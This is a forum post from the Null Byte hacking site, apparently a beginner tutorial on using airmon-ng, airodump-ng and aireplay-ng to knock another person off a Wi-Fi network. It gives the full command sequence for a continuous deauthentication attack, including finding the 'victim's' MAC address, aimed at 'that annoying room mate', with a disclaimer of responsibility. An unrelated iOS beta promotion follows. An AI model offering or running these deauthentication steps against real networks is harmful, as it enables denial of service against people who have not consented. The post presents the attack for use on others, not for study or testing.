Header Banner
Null Byte Logo
Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker

How to Kick People Off Your Internet

Command line output showing network processes and monitor mode enabled.

This is my first post please tell me what I can improve. (I don't claim any of the images. I tried taking screen shots but it froze my computer. ) I will be using wlan0 because thats my wireless but use yours.

I'm going to tech you have to kick that annoying room mate of the Internet. (I'M NOT RESPONSIBLE FOR ANY THING YOU DO WITH THIS INFO.)

Airmon-Ng

open up a terminal and type airmon-ng start wlan0 (or eth0 if your using Ethernet.) (Some times you might have to type airmon-ng check kill)

Network interface configuration with monitor mode enabled.

Airodump-Ng

Next type airodump-ng wlan0 then find your Internet copy its bssid then type airodump-ng --bssid (your bssid) wlan0. It will show your victims mac.

Network scan results showing various BSSID and station information.

Aireplay-Ng

Now if you know their IP address you don't need to use airodump-ng.

If you know their ip address you can type aireplay-ng --deauth 0 -a (networks bssid) -k (Their ip address)

If your going to use their mac address type this aireplay-ng --deauth 0 -a (networks bssid) -c (Their mac address)

The 0 in Deauth 0 means keep deauth them until you stop it with CTRL C.

Hope you enjoyed this tutorial if you need help just comment whats wrong and I will get back to you as fast as possible.

Apple's iOS 26 and iPadOS 26 updates are packed with new features, and you can try them before almost everyone else. First, check Gadget Hacks' list of supported iPhone and iPad models, then follow the step-by-step guide to install the iOS/iPadOS 26 beta — no paid developer account required.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!